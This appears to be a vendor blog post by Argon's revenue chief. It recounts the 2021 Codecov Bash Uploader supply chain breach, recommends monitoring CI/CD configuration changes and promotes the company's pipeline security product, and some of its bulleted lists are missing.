Apr 16 · 4 min read
A new “double” software supply chain attack that compromised Codecov Bash Uploader was revealed to have gone undetected since January and exposed sensitive secrets like tokens, keys and credentials from various organizations around the world.
As published on SECURITYWEEK on April 15, the attack occurred four months ago but was only discovered by a Codecov customer on April 1, 2021, the company said in a note acknowledging the severity of the breach. According to the company, the breach allowed the attackers to export information stored in its users’ continuous integration (CI) pipeline environments, which was then sent to a third-party server outside of Codecov’s infrastructure”.
The breach allowed a malicious third-party to alter a version of the bash uploader script to potentially export information subject to continuous integration (CI) to a third-party server, which according to Codecov, could potentially affect:
In response, organizations need to take proactive action to secure their supply chain from such attacks. This requires a conscious approach to CI/CD security posture that takes into account the sophisticated nature of today’s attacks.
Organizations need to watch their configuration files closely. Whenever any change is made to a config file, this change needs to be checked for any possible privilege escalation, or suspicious access. Config files are central to the operations of a software supply chain and should not be overlooked. Any suspicion should trigger notifications and alerts to the appropriate stakeholders, and stop certain tasks until it’s verified to be safe. This automation, being immediate, can act as a strong defense against attacks, as it’s significantly faster than manual human intervention.
Here are 3 actionable things you can do to secure your software supply chain starting tomorrow:
Running CI/CD pipelines without strong security posture open your organization to severe cyber risks
The last thing any organization wants is to be in the news for the wrong reasons – a security attack or data breach. This threatens to break customer trust, cost businesses real revenue, and continues to have lingering damage for months or even years. The better alternative is to determine and implement actions to better secure your CI/CD pipeline, which will help you keep supply chain attacks (and the long-lasting damage they incur) far away from your organization.
Argon can help you gain the visibility and control you need over your CI/CD pipeline to mitigate such supply chain risks. Argon CI/CD pipeline security will help you:
Eran Orzel, Argon’s Chief Revenue Officer
What is DevSecOps? DevOps is now the default approach to agile software development and deployment in most tech companies. With…
The COVID-19 pandemic forced the world to rethink not only their lives but also their business operations. There was a…
The year 2020, despite the coronavirus pandemic, was an opportunity for hackers to create major upheaval. As the world dealt…